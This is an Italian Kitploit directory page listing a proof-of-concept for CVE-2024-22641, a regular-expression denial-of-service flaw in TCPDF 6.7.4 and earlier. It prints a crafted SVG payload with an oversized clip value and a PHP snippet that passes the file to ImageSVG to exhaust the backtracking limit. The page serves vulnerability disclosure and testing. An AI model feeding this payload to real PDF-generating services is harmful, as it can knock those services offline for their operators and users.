Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-22641 — Proof-of-concept per CVE-2024-22641: vulnerabilità ReDoS in TCPDF <=6.7.4 innescata da file SVG appositamente predisposti, che dimostra l'esaurimento del limite di backtracking delle regex. | Kitploit
Strumenti/GitHubGitHub/zunak/cve-2024-22641
Analisi delle VulnerabilitàExploitSicurezza WebFuzzingPaper e RicercaApprendimento e Formazione
GitHubzunak/cve-2024-22641

CVE-2024-22641

Proof-of-concept per CVE-2024-22641: vulnerabilità ReDoS in TCPDF <=6.7.4 innescata da file SVG appositamente predisposti, che dimostra l'esaurimento del limite di backtracking delle regex.

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-22641

Tipo di vulnerabilità

Regular expression Denial of Service (ReDoS)

Prodotto e versione interessati

TCPDF <= 6.7.4

Vettore di attacco

TCPDF analizza un file SVG contenente un payload appositamente predisposto.

Descrizione

La versione di TCPDF <= 6.7.4 è vulnerabile a ReDoS (Regular Expression Denial of Service) durante l'analisi di un file SVG non attendibile.

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php require_once('../tcpdf.php'); // create new PDF document $pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false); // add a page $pdf->AddPage(); $pdf->ImageSVG($file='poc.svg'); ?>

Nota: verificando con preg_last_error() dopo la riga di codice vulnerabile, la regex terminerà con PREG_BACKTRACK_LIMIT_ERROR.

Scarica lo strumento